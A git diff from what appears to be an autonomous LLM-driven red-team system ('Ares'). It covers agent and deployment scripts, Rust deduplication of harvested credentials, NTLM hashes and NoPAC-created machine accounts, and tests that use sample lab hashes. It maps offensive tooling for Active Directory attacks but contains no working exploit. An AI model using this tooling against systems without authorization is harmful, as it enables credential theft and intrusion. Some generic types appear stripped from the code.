diff --git a/.claude/agents/python-ares-expert.md b/.claude/agents/python-ares-expert.md deleted file mode 100644 index 4663ce3e..00000000 --- a/.claude/agents/python-ares-expert.md +++ /dev/null @@ -1,131 +0,0 @@ ---- -name: python-ares-expert -description: Expert on the Python ares codebase at ../ares (src/ares/). Use when you need to understand Python ares architecture, look up how something works in Python, find equivalent implementations, or answer questions about the original Python system before porting to Rust. -tools: Read, Glob, Grep, Bash -model: sonnet ---- - -You are an expert on the **Python ares codebase** located at `/Users/l/dreadnode/ares`. Your job is to answer questions about the Python implementation accurately by reading the actual source code. - -## Project Overview - -Ares is an autonomous security operations multi-agent system with: - -- **Red Team**: LLM-powered penetration testing with coordinator/worker architecture -- **Blue Team**: SOC alert investigation and threat hunting - -Built on the Dreadnode Agent SDK, rigging (LLM framework), and MITRE ATT&CK. - -## Codebase Layout - -``` -/Users/l/dreadnode/ares/ - src/ares/ - core/ # Core framework - dispatcher/ # Task dispatcher (routing, throttling, result processing, publishing) - worker/ # Worker agent (_worker.py, operations.py, prompts.py, dc_resolution.py) - orchestrator/ # Orchestrator (_orchestrator.py) - factories/ # Agent factories (red_agents.py, blue_factory.py) - replay/ # Deterministic replay - persistent_store/ # Persistent storage - blue_dispatcher/ # Blue team dispatcher - blue_worker/ # Blue team worker - models.py # ALL data models (Credential, Host, Hash, Target, SharedRedTeamState, etc.) - config.py # Configuration loading - state_backend.py # Redis state backend (red team) - blue_state_backend.py # Redis state backend (blue team) - task_queue.py # Redis task queue (red team) - blue_task_queue.py # Redis task queue (blue team) - redis_client.py # Redis client wrapper - recovery.py # Checkpoint/recovery - persistence.py # State serialization - workflows.py # Credential expansion workflows - engines.py # Question generation engines - correlation.py # Red-Blue correlation - evidence_validation.py # Evidence dedup/validation - k8s_executor.py # Kubernetes pod execution - lateral_analyzer.py # Graph-based lateral movement - messages.py # Inter-agent messages - orchestrator_client.py # Client for orchestrator communication - orchestrator_service.py # Orchestrator service pod - query_resilience.py # Query retry logic - remote.py # Remote K8s execution - templates.py # Jinja2 template loading - tracing.py # OpenTelemetry tracing - capability_registry.py # Agent capability registration - context_manager.py # LLM context window management - tool_retrieval.py # Dynamic tool loading - circuit_breaker.py # Circuit breaker pattern - tools/ - red/ # Red team tools - credential_discovery/ # discovery.py, harvesting.py, cracking.py, pilfering.py - reconnaissance.py # nmap, enum4linux, user/share enumeration - orchestrator.py # Dispatch functions - kerberos_attacks.py # Delegation, tickets, ADCS - lateral_movement.py # psexec, wmi, smb, evil-winrm - acl_attacks.py # bloodyAD, pywhisker, dacledit - privilege_escalation.py - coercion.py # PetitPotam, Coercer, relay - cve_exploits.py - reporting.py - common.py - blue/ # Blue team tools - investigation.py, grafana.py, query_templates.py, observability.py, actions.py, learning.py - shared/ - mitre.py # MITRE ATT&CK integration - agents/ - red/ # Red team agents (dynamic via factories) - blue/ - soc_investigator.py # SOC investigation orchestrator - integrations/ # Third-party integrations - reports/ # Report generation (investigation.py, redteam.py, blueteam.py) - eval/ # Evaluation framework - templates/ # Jinja2 prompt templates - redteam/agents/ # Per-role agent prompts (orchestrator.md.jinja, recon.md.jinja, etc.) - main.py # CLI entry point - cli_ops.py # CLI operations (loot, status, inject, etc.) - cli_blue_ops.py # Blue team CLI operations - cli_history.py # CLI history - tests/ # Test suite - docs/ - codemap.md # Full codebase map - red.md # Red team architecture (AUTHORITATIVE) - blue.md # Blue team workflow - config/ - multi-agent-production.yaml # Agent configurations -``` - -## Multi-Agent Architecture - -- **Orchestrator**: Central LLM coordinator, dispatches tasks, never executes tools directly -- **Workers**: RECON, CREDENTIAL_ACCESS, CRACKER, ACL, PRIVESC, LATERAL, COERCION -- **Communication**: Redis pub/sub + task queues -- **State**: Write-through cache (memory + Redis persistence) -- **Namespace**: `attack-simulation` in Kubernetes - -## Key Design Patterns - -1. **Write-through cache**: `SharedRedTeamState` in memory, persisted to Redis via `state_backend.py` -2. **Task queue**: Redis-based with priority routing in `task_queue.py` -3. **Result processing**: `dispatcher/result_processing.py` extracts credentials/hashes from tool output -4. **Publishing**: `dispatcher/publishing.py` broadcasts discovered credentials to all agents -5. **Recovery**: `recovery.py` can restore operation state from Redis checkpoints -6. **Factory pattern**: `factories/red_agents.py` maps AgentRole -> toolsets (ROLE_TOOLSETS) - -## How to Answer Questions - -1. **Always read the actual source files** before answering - don't guess from the layout alone -2. Start with the most relevant file based on the question -3. For architecture questions, read `docs/red.md` and `docs/codemap.md` -4. For model/data questions, read `src/ares/core/models.py` -5. For tool implementations, read the specific file in `src/ares/tools/red/` -6. For orchestration logic, read `src/ares/core/dispatcher/` and `src/ares/core/orchestrator/` -7. Be precise: include file paths, function names, and line numbers -8. When asked "how does X work", trace the full code path - -## Important Context - -- This codebase is being ported to Rust (the parent project at `/Users/l/dreadnode/ares-rust-cli/ares-rust/`) -- Questions will often be about understanding the Python implementation to inform the Rust port -- The Python codebase uses: rigging (LLM), loguru (logging), redis, kubernetes, cyclopts (CLI), pydantic (models) -- Domain conventions: `contoso.local` (primary), `fabrikam.local` (secondary), `192.168.58.x` subnet diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index bbe3514b..81496a89 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -966,6 +966,7 @@ tasks: SECRETS_ID: '{{.SECRETS_ID | default "ares/api-keys"}}' LLM_MODEL: '{{.LLM_MODEL | default ""}}' FLUSH_REDIS: '{{.FLUSH_REDIS | default "true"}}' + OPERATION_ID: '{{.OPERATION_ID | default ""}}' cmds: - | INSTANCE_ID=$(aws ec2 describe-instances \ @@ -981,7 +982,11 @@ tasks: exit 1 fi - OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + if [ -n "{{.OPERATION_ID}}" ]; then + OP_ID="{{.OPERATION_ID}}" + else + OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + fi echo -e "{{.INFO}} Operation ID: $OP_ID" # Build target IPs JSON array diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl index 619a4bc2..27fe3f57 100755 --- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl +++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl @@ -1,6 +1,11 @@ #!/bin/bash -# Launch ares orchestrator with environment variables -# Placeholders are substituted by the calling task via envsubst/sed +# Launch ares orchestrator in its own systemd transient unit so it (and any +# tool subprocesses it spawns) gets its own cgroup, separate from +# amazon-ssm-agent.service. Otherwise everything launched by SSM +# RunShellScript inherits SSM's cgroup and competes with it for memory — +# resulting in CONSTRAINT_MEMCG OOM-kills regardless of OOMScoreAdjust. +set -euo pipefail + export ARES_REDIS_URL=redis://127.0.0.1:6379 export RUST_LOG=info export ARES_OPERATION_ID='__ARES_PAYLOAD__' @@ -25,13 +30,56 @@ if [ -n "$_blue_model" ] && [ "$_blue_model" = "${_blue_model#__}" ]; then fi export ARES_DEPLOYMENT='__ARES_DEPLOYMENT__' export ARES_CONFIG=/etc/ares/config.yaml +export ARES_MAX_CONCURRENT_TASKS=8 _otel_endpoint='__OTEL_TRACES_ENDPOINT__' if [ -n "$_otel_endpoint" ] && [ "$_otel_endpoint" = "${_otel_endpoint#__}" ]; then export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT="$_otel_endpoint" export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf' export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' fi + +mkdir -p /var/log/ares + +# Stop any prior orchestrator (transient unit or stray nohup process). +systemctl stop ares-orchestrator.service 2>/dev/null || true +systemctl reset-failed ares-orchestrator.service 2>/dev/null || true pkill -f 'ares orchestrator' 2>/dev/null || true sleep 1 -nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 & -echo "Orchestrator started (PID: $!)" + +# Spawn as a transient systemd service in system-ares.slice. --setenv=NAME +# (no value) inherits from current environment, preserving quoting that +# would otherwise be mangled by EnvironmentFile parsing of JSON payloads. +exec systemd-run \ + --unit=ares-orchestrator.service \ + --slice=system-ares.slice \ + --description="Ares Orchestrator (transient)" \ + --collect \ + --setenv=ARES_REDIS_URL \ + --setenv=RUST_LOG \ + --setenv=ARES_OPERATION_ID \ + --setenv=OPENAI_API_KEY \ + --setenv=ANTHROPIC_API_KEY \ + --setenv=DREADNODE_API_KEY \ + --setenv=DREADNODE_SERVER_URL \ + --setenv=DREADNODE_ORGANIZATION \ + --setenv=DREADNODE_WORKSPACE \ + --setenv=DREADNODE_PROJECT \ + --setenv=GRAFANA_SERVICE_ACCOUNT_TOKEN \ + --setenv=GRAFANA_URL \ + --setenv=ARES_LLM_MODEL \ + --setenv=ARES_TOOL_DISPATCH \ + --setenv=ARES_BLUE_ENABLED \ + --setenv=ARES_BLUE_LLM_MODEL \ + --setenv=ARES_DEPLOYMENT \ + --setenv=ARES_CONFIG \ + --setenv=ARES_MAX_CONCURRENT_TASKS \ + --setenv=OTEL_EXPORTER_OTLP_TRACES_ENDPOINT \ + --setenv=OTEL_EXPORTER_OTLP_PROTOCOL \ + --setenv=OTEL_RESOURCE_ATTRIBUTES \ + --property=StandardOutput=append:/var/log/ares/orchestrator.log \ + --property=StandardError=append:/var/log/ares/orchestrator.log \ + --property=OOMScoreAdjust=-500 \ + --property=TasksMax=4096 \ + --property=MemoryHigh=8G \ + --property=MemoryMax=10G \ + /usr/local/bin/ares orchestrator diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh index f073ecfd..858fcfd8 100755 --- a/.taskfiles/ec2/scripts/setup.sh +++ b/.taskfiles/ec2/scripts/setup.sh @@ -21,6 +21,46 @@ fi echo "=== Creating directories ===" mkdir -p /var/log/ares /etc/ares +echo "=== Removing legacy ares-worker@ unit (renamed in PR #226) ===" +if [ -f /etc/systemd/system/ares-worker@.service ]; then + for role in recon credential_access cracker acl privesc lateral coercion; do + systemctl disable --now "ares-worker@${role}.service" 2>/dev/null || true + done + rm -f /etc/systemd/system/ares-worker@.service +fi + +echo "=== Creating system-ares.slice with global memory cap ===" +cat >/etc/systemd/system/system-ares.slice <<'SLICE_EOF' +[Unit] +Description=Ares system slice (orchestrator + workers) +Before=slices.target + +[Slice] +MemoryMax=12G +MemoryHigh=10G +TasksMax=8192 +SLICE_EOF + +echo "=== Ensuring 4G swap file (OOM cushion) ===" +if [ ! -f /swapfile ] || [ "$(stat -c%s /swapfile 2>/dev/null || echo 0)" -lt 4000000000 ]; then + swapoff /swapfile 2>/dev/null || true + rm -f /swapfile + fallocate -l 4G /swapfile || dd if=/dev/zero of=/swapfile bs=1M count=4096 + chmod 600 /swapfile + mkswap /swapfile + swapon /swapfile + if ! grep -q '^/swapfile' /etc/fstab; then + echo '/swapfile none swap sw 0 0' >>/etc/fstab + fi +fi + +echo "=== Tuning OOM behavior (oom_kill_allocating_task, swappiness) ===" +cat >/etc/sysctl.d/90-ares.conf <<'SYSCTL_EOF' +vm.oom_kill_allocating_task = 1 +vm.swappiness = 10 +SYSCTL_EOF +sysctl -p /etc/sysctl.d/90-ares.conf >/dev/null + echo "=== Creating systemd worker template unit ===" cat >/etc/systemd/system/ares@.service <<'UNIT_EOF' [Unit] @@ -42,9 +82,19 @@ RestartSec=5 StandardOutput=append:/var/log/ares/%i.log StandardError=append:/var/log/ares/%i.log +# Contain child processes (netexec, hashcat, nmap, etc.) within this cgroup. +# Without these limits, runaway tool processes can OOM the entire system and +# take down the SSM agent (see: Apr 2026 incident). +Delegate=yes +Slice=system-ares.slice +MemoryHigh=1500M +MemoryMax=2G +TasksMax=256 + [Install] WantedBy=multi-user.target UNIT_EOF +systemctl daemon-reload echo "=== Installing cracking tools ===" if ! command -v hashcat >/dev/null 2>&1 || ! command -v john >/dev/null 2>&1; then diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 73b2119a..5bf48a28 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -738,6 +738,7 @@ tasks: BLUE_ENABLED: '{{.BLUE_ENABLED | default "0"}}' BLUE_LLM_MODEL: '{{.BLUE_LLM_MODEL | default ""}}' EC2_DEPLOYMENT: '{{.EC2_DEPLOYMENT | default "alpha-operator-range"}}' + STRATEGY: '{{.STRATEGY | default "comprehensive"}}' RESOLVED_TARGETS: sh: | TARGET="{{.TARGET}}" @@ -867,7 +868,7 @@ tasks: # Build JSON payload for ARES_OPERATION_ID TARGET_IPS_JSON=$(echo "{{.RESOLVED_TARGETS}}" | tr ',' '\n' | sed 's/^/"/;s/$/"/' | paste -sd, - | sed 's/^/[/;s/$/]/') - ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\"}" + ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\",\"strategy\":\"{{.STRATEGY}}\"}" # Build orchestrator launch script from template ORCH_SCRIPT=$(mktemp) diff --git a/Cargo.lock b/Cargo.lock index c3ce37e8..780c8df5 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -189,6 +189,7 @@ dependencies = [ "anyhow", "approx", "ares-core", + "base64", "chrono", "redis", "regex", diff --git a/ansible/playbooks/ares/goad_attack_box.yml b/ansible/playbooks/ares/goad_attack_box.yml index 2cc04435..5c4cccbf 100644 --- a/ansible/playbooks/ares/goad_attack_box.yml +++ b/ansible/playbooks/ares/goad_attack_box.yml @@ -32,7 +32,7 @@ alloy_deployment_name: "goad-attack-box" alloy_server_id: "" alloy_instance_id: "" - alloy_loki_endpoint: "{{ alloy_loki_endpoint }}" + alloy_loki_endpoint: "{{ lookup('env', 'ALLOY_LOKI_ENDPOINT') | default('http://localhost:3100/loki/api/v1/push', true) }}" alloy_version: "1.10.1" # Python version @@ -113,9 +113,14 @@ changed_when: true roles: - # AWS infrastructure agents + # AWS infrastructure agents — skipped on non-AWS clouds because they + # require the EC2 instance metadata service (cloudwatch-agent's + # `fetch-config -m ec2` hits 169.254.169.254 and aborts the build + # on Azure). - role: dreadnode.nimbus_range.aws_ssm_agent + when: cloud_provider | default('aws') == 'aws' - role: dreadnode.nimbus_range.aws_cloudwatch_agent + when: cloud_provider | default('aws') == 'aws' # Base Ares requirements - role: dreadnode.nimbus_range.base diff --git a/ares-cli/src/dedup/credentials.rs b/ares-cli/src/dedup/credentials.rs index d31ae140..416d0401 100644 --- a/ares-cli/src/dedup/credentials.rs +++ b/ares-cli/src/dedup/credentials.rs @@ -5,7 +5,7 @@ use std::sync::LazyLock; use ares_core::models::Credential; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Strip ANSI escape sequences from text. pub(super) static RE_ANSI: LazyLock = @@ -75,6 +75,9 @@ pub(crate) fn sanitize_credentials(creds: &mut Vec) { if username.starts_with("evil") && username.ends_with('$') { return false; } + if is_ghost_machine_account(&username) { + return false; + } true }); } diff --git a/ares-cli/src/dedup/domains.rs b/ares-cli/src/dedup/domains.rs index b0bd5a0c..82818add 100644 --- a/ares-cli/src/dedup/domains.rs +++ b/ares-cli/src/dedup/domains.rs @@ -179,12 +179,14 @@ pub(crate) fn normalize_state_domains( { let mut valid_domains: HashSet = HashSet::new(); + let mut host_fqdns: HashSet = HashSet::new(); if let Some(td) = target_domain { valid_domains.insert(td.to_lowercase()); } for host in hosts { if !host.hostname.is_empty() && host.hostname.contains('.') { let lower = host.hostname.to_lowercase(); + host_fqdns.insert(lower.clone()); let parts: Vec<&str> = lower.split('.').collect(); if parts.len() > 1 { valid_domains.insert(parts[1..].join(".")); @@ -193,10 +195,20 @@ pub(crate) fn normalize_state_domains( } for user in users { if !user.domain.is_empty() { - valid_domains.insert(user.domain.to_lowercase()); + let d = user.domain.to_lowercase(); + // Skip user.domain values that are actually a host FQDN — + // some parsers misattribute and assign the DC's FQDN as the + // user's AD domain, which would otherwise let the FQDN survive + // the retain() filter below as a phantom "domain". + if !host_fqdns.contains(&d) { + valid_domains.insert(d); + } } } - domains.retain(|d| valid_domains.contains(&d.to_lowercase())); + domains.retain(|d| { + let lower = d.to_lowercase(); + valid_domains.contains(&lower) && !host_fqdns.contains(&lower) + }); } } diff --git a/ares-cli/src/dedup/hashes.rs b/ares-cli/src/dedup/hashes.rs index 184bbec8..26c84e1f 100644 --- a/ares-cli/src/dedup/hashes.rs +++ b/ares-cli/src/dedup/hashes.rs @@ -1,9 +1,9 @@ -use std::collections::HashSet; +use std::collections::{HashMap, HashSet}; use ares_core::models::Hash; use super::credentials::strip_ansi; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; fn normalize_hash_type(hash_type: &str) -> String { match hash_type.trim().to_lowercase().as_str() { @@ -17,20 +17,58 @@ fn normalize_hash_type(hash_type: &str) -> String { } pub(crate) fn dedup_hashes(hashes: &[Hash]) -> Vec { - let mut seen = HashSet::new(); - let mut result = Vec::new(); + // First pass: for each (username, hash_type, hash_value), remember the longest + // non-empty domain we've seen. Parsers sometimes emit the same hash twice — once + // with `DOMAIN\` prefix (populated domain) and once bare (empty domain) — and + // without this lookup the keyed-by-domain dedup keeps both as separate rows. + let mut domain_lookup: HashMap<(String, String, String), String> = HashMap::new(); for h in hashes { let domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); - let hash_value = strip_ansi(&h.hash_value); + if domain.is_empty() { + continue; + } let key = ( - domain.clone(), h.username.trim().to_lowercase(), h.hash_type.trim().to_lowercase(), - hash_value.trim().to_lowercase(), + strip_ansi(&h.hash_value).trim().to_lowercase(), ); + domain_lookup + .entry(key) + .and_modify(|d| { + if domain.len() > d.len() { + *d = domain.clone(); + } + }) + .or_insert(domain); + } + + let mut seen = HashSet::new(); + let mut result = Vec::new(); + for h in hashes { + let username = strip_ansi(&h.username); + if is_ghost_machine_account(&username) { + continue; + } + let username_l = h.username.trim().to_lowercase(); + let hash_type_l = h.hash_type.trim().to_lowercase(); + let hash_value = strip_ansi(&h.hash_value); + let hash_value_l = hash_value.trim().to_lowercase(); + + let mut domain = strip_trailing_dot(h.domain.trim()).to_lowercase(); + if domain.is_empty() { + if let Some(d) = domain_lookup.get(&( + username_l.clone(), + hash_type_l.clone(), + hash_value_l.clone(), + )) { + domain.clone_from(d); + } + } + + let key = (domain.clone(), username_l, hash_type_l, hash_value_l); if seen.insert(key) { let mut cleaned = h.clone(); - cleaned.domain = strip_trailing_dot(cleaned.domain.trim()).to_lowercase(); + cleaned.domain = domain; cleaned.hash_type = normalize_hash_type(&cleaned.hash_type); cleaned.hash_value = hash_value.trim().to_string(); cleaned.username = strip_ansi(&cleaned.username); diff --git a/ares-cli/src/dedup/mod.rs b/ares-cli/src/dedup/mod.rs index 9ae3550e..759d4ed7 100644 --- a/ares-cli/src/dedup/mod.rs +++ b/ares-cli/src/dedup/mod.rs @@ -7,9 +7,32 @@ pub(crate) mod users; #[cfg(test)] mod tests; -/// Strip trailing DNS root dot from domain strings (e.g. `child.contoso.local.` → `child.contoso.local`). +use regex::Regex; +use std::sync::LazyLock; + +/// Strip trailing DNS root dot and NetExec "0." artifact from domain strings +/// (e.g. `child.contoso.local.` → `child.contoso.local`, +/// `contoso.local0` → `contoso.local`). pub(super) fn strip_trailing_dot(s: &str) -> &str { - s.strip_suffix('.').unwrap_or(s) + let s = s.trim_end_matches('.'); + // NetExec sometimes appends "0" to domain TLDs. Strip if the char + // before the trailing 0 is alphabetic (i.e. TLD-like, not "host10"). + match s.strip_suffix('0') { + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + } +} + +/// Auto-generated Windows hostname pattern (`WIN-` + 11 alphanumerics + optional `$`). +/// Used to filter ghost machine accounts that the agent created itself via +/// NoPAC / MachineAccountQuota — not real lab hosts, just our own residue. +static GHOST_MACHINE_ACCOUNT_RE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^WIN-[A-Z0-9]{11}\$?$").unwrap()); + +/// True if `username` looks like an auto-generated Windows machine account +/// (e.g. `WIN-G9FWV8ZNSCL$`) — typically agent-created via NoPAC. +pub(super) fn is_ghost_machine_account(username: &str) -> bool { + GHOST_MACHINE_ACCOUNT_RE.is_match(username.trim()) } pub(crate) use credentials::{dedup_credentials, sanitize_credentials}; diff --git a/ares-cli/src/dedup/tests.rs b/ares-cli/src/dedup/tests.rs index 37741985..2570f229 100644 --- a/ares-cli/src/dedup/tests.rs +++ b/ares-cli/src/dedup/tests.rs @@ -361,6 +361,25 @@ fn strip_trailing_dot_removes_dot() { assert_eq!(strip_trailing_dot("."), ""); } +#[test] +fn strip_trailing_dot_removes_netexec_zero_artifact() { + use super::strip_trailing_dot; + // NetExec appends "0" or "0." to domain names + assert_eq!(strip_trailing_dot("contoso.local0"), "contoso.local"); + assert_eq!(strip_trailing_dot("contoso.local0."), "contoso.local"); + assert_eq!( + strip_trailing_dot("child.contoso.local0"), + "child.contoso.local" + ); + assert_eq!(strip_trailing_dot("fabrikam.local0."), "fabrikam.local"); + // Must NOT strip real trailing 0 from hostnames like "host10" + assert_eq!(strip_trailing_dot("host10"), "host10"); + assert_eq!( + strip_trailing_dot("dc10.contoso.local"), + "dc10.contoso.local" + ); +} + #[test] fn strip_ansi_removes_escape_sequences() { use super::credentials::strip_ansi; @@ -621,6 +640,26 @@ fn normalize_state_domains_domain_filtering_based_on_host_fqdns() { assert!(!domains.contains(&"orphan.local".to_string())); } +#[test] +fn normalize_state_domains_drops_host_fqdn_masquerading_as_domain() { + // A parser/credential publish path sometimes pushes a DC's FQDN + // (e.g. `WIN-30DZ5NGFA7M.c26h.local`) into the domain set. The dedup + // filter must drop entries that exactly match a known host hostname, + // even when a user or credential has the FQDN in its `domain` field. + let users = vec![make_user("win-30dz5ngfa7m.c26h.local", "admin")]; + let mut creds = vec![]; + let mut hashes = vec![]; + let mut domains = vec![ + "c26h.local".to_string(), + "win-30dz5ngfa7m.c26h.local".to_string(), + ]; + let hosts = vec![make_host("192.168.58.10", "win-30dz5ngfa7m.c26h.local")]; + + normalize_state_domains(&users, &mut creds, &mut hashes, &mut domains, &hosts, None); + + assert_eq!(domains, vec!["c26h.local".to_string()]); +} + #[test] fn normalize_state_domains_domain_kept_from_target_domain() { // target_domain should cause that domain to be retained even without hosts/users. @@ -1055,3 +1094,118 @@ fn dedup_credentials_normalizes_username_case() { let deduped = dedup_credentials(&creds); assert_eq!(deduped[0].username, "admin"); } + +#[test] +fn is_ghost_machine_account_matches_nopac_pattern() { + use super::is_ghost_machine_account; + assert!(is_ghost_machine_account("WIN-G9FWV8ZNSCL$")); + assert!(is_ghost_machine_account("WIN-4D75DLR6UCC$")); + assert!(is_ghost_machine_account("win-bjak8xunhgd$")); + // without trailing $ + assert!(is_ghost_machine_account("WIN-3KSGCLTS7NX")); +} + +#[test] +fn is_ghost_machine_account_rejects_real_hosts() { + use super::is_ghost_machine_account; + assert!(!is_ghost_machine_account("DC01$")); + assert!(!is_ghost_machine_account("WS01$")); + assert!(!is_ghost_machine_account("WIN-2019$")); // wrong length + assert!(!is_ghost_machine_account("administrator")); + assert!(!is_ghost_machine_account("")); +} + +#[test] +fn sanitize_credentials_drops_ghost_machine_accounts() { + let mut creds = vec![ + make_cred("contoso.local", "WIN-G9FWV8ZNSCL$", "P@ss1"), + make_cred("contoso.local", "jdoe", "P@ss1"), + ]; + sanitize_credentials(&mut creds); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "jdoe"); +} + +#[test] +fn dedup_hashes_collapses_bare_and_prefixed_same_user() { + // Parsers emit the same hash twice when secretsdump output mixes + // `Administrator:RID:...` (bare) and `DOMAIN\Administrator:RID:...` (prefixed) + // — bare gets empty domain, prefixed gets the resolved FQDN. + // The bare row should be folded into the prefixed one. + let hashes = vec![ + make_hash("", "Administrator", "NTLM", "aabbccdd"), + make_hash("contoso.local", "Administrator", "NTLM", "aabbccdd"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, "contoso.local"); +} + +#[test] +fn dedup_hashes_keeps_distinct_users_sharing_hash() { + // Two different users can end up with identical NTLMs (shared password). + // They must NOT be folded together — dedup keys on + // (username, hash_type, hash_value), not just (hash_type, hash_value). + let hashes = vec![ + make_hash("contoso.local", "Administrator", "NTLM", "deadbeefcafe"), + make_hash("contoso.local", "svc_backup", "NTLM", "deadbeefcafe"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 2); +} + +#[test] +fn dedup_hashes_bare_with_no_domain_sibling_kept() { + // If we only ever saw the bare form, we cannot infer a domain — keep it as-is. + let hashes = vec![make_hash("", "Administrator", "NTLM", "aabbccdd")]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].domain, ""); +} + +#[test] +fn dedup_hashes_picks_longest_domain_when_multiple_known() { + // If the same user+hash appears with both a parent and a child domain (rare + // cross-forest replication artifact), prefer the longer/more-specific FQDN + // when filling in a bare entry. + let hashes = vec![ + make_hash("", "krbtgt", "NTLM", "deadbeef"), + make_hash("contoso.local", "krbtgt", "NTLM", "deadbeef"), + make_hash("child.contoso.local", "krbtgt", "NTLM", "deadbeef"), + ]; + let deduped = dedup_hashes(&hashes); + // The bare entry folds into the longest sibling; the two populated entries stay distinct. + assert_eq!(deduped.len(), 2); + let domains: Vec<&str> = deduped.iter().map(|h| h.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"child.contoso.local")); +} + +#[test] +fn dedup_hashes_drops_ghost_machine_accounts() { + let hashes = vec![ + make_hash( + "contoso.local", + "WIN-4D75DLR6UCC$", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:da118ed665879916ceaacfb98e3ee74e", + ), + make_hash("contoso.local", "admin", "NTLM", "aabb"), + ]; + let deduped = dedup_hashes(&hashes); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].username, "admin"); +} + +#[test] +fn dedup_users_drops_ghost_machine_accounts() { + let nb = HashMap::new(); + let mut ghost = make_user("contoso.local", "WIN-BJAK8XUNHGD$"); + ghost.source = "kerberos_enum".to_string(); + let mut real = make_user("contoso.local", "jdoe"); + real.source = "kerberos_enum".to_string(); + let users = vec![ghost, real]; + let deduped = dedup_users(&users, &nb); + assert_eq!(deduped.len(), 1); + assert_eq!(deduped[0].username, "jdoe"); +} diff --git a/ares-cli/src/dedup/users.rs b/ares-cli/src/dedup/users.rs index c8087de8..9bd4abdc 100644 --- a/ares-cli/src/dedup/users.rs +++ b/ares-cli/src/dedup/users.rs @@ -2,7 +2,7 @@ use std::collections::HashMap; use ares_core::models::User; -use super::strip_trailing_dot; +use super::{is_ghost_machine_account, strip_trailing_dot}; /// Noise usernames that should be filtered. pub(super) const NOISE_USERNAMES: &[&str] = &[ @@ -81,6 +81,7 @@ pub(crate) fn dedup_users(users: &[User], netbios_to_fqdn: &HashMap, exploited: &HashSet, @@ -303,20 +308,57 @@ fn print_vulnerabilities( return; } - let mut vulns: Vec<(&String, &VulnerabilityInfo)> = discovered.iter().collect(); - vulns.sort_by(|a, b| { - a.1.priority - .cmp(&b.1.priority) - .then(a.1.vuln_type.cmp(&b.1.vuln_type)) - }); + let mut exploitable: Vec<(&String, &VulnerabilityInfo)> = Vec::new(); + let mut findings: Vec<(&String, &VulnerabilityInfo)> = Vec::new(); + for (id, vuln) in discovered.iter() { + if vuln.priority <= EXPLOITABLE_PRIORITY_MAX { + exploitable.push((id, vuln)); + } else { + findings.push((id, vuln)); + } + } + let sort_vulns = |vulns: &mut Vec<(&String, &VulnerabilityInfo)>| { + vulns.sort_by(|a, b| { + a.1.priority + .cmp(&b.1.priority) + .then(a.1.vuln_type.cmp(&b.1.vuln_type)) + }); + }; + sort_vulns(&mut exploitable); + sort_vulns(&mut findings); + + let exploited_in_exploitable = exploitable + .iter() + .filter(|(id, _)| exploited.contains(*id)) + .count(); - println!("Discovered Vulnerabilities ({}):", vulns.len()); + println!( + "Exploitable Vulnerabilities ({}, {} exploited):", + exploitable.len(), + exploited_in_exploitable + ); + if exploitable.is_empty() { + println!(" (none)"); + } else { + print_vuln_table(&exploitable, exploited); + } + println!(); + + println!("Findings ({}):", findings.len()); + if !findings.is_empty() { + print_vuln_table(&findings, exploited); + } + println!(); +} + +/// Render a single vulnerability table body (header + rows). +fn print_vuln_table(vulns: &[(&String, &VulnerabilityInfo)], exploited: &HashSet) { println!( " {:<30} {:<20} {:>8} {:>9} Details", "Type", "Target", "Priority", "Exploited" ); println!(" {}", "-".repeat(100)); - for (vuln_id, vuln) in &vulns { + for (vuln_id, vuln) in vulns { let is_exploited = exploited.contains(*vuln_id); let exploited_mark = if is_exploited { "\u{2713}" } else { "\u{2717}" }; @@ -336,7 +378,6 @@ fn print_vulnerabilities( vuln.vuln_type, vuln.target, vuln.priority, exploited_mark, details_display ); } - println!(); } /// Format vulnerability details HashMap into a readable string. @@ -422,10 +463,12 @@ fn print_attack_path(timeline_events: &[serde_json::Value]) { .and_then(|v| v.as_str()) .unwrap_or("unknown event"); + let already_critical = description.starts_with("CRITICAL:"); let desc_lower = description.to_lowercase(); - let is_critical = desc_lower.contains("krbtgt") - || (desc_lower.contains("administrator") && desc_lower.contains("hash")) - || desc_lower.contains("domain admin"); + let is_critical = !already_critical + && (desc_lower.contains("krbtgt") + || (desc_lower.contains("administrator") && desc_lower.contains("hash")) + || 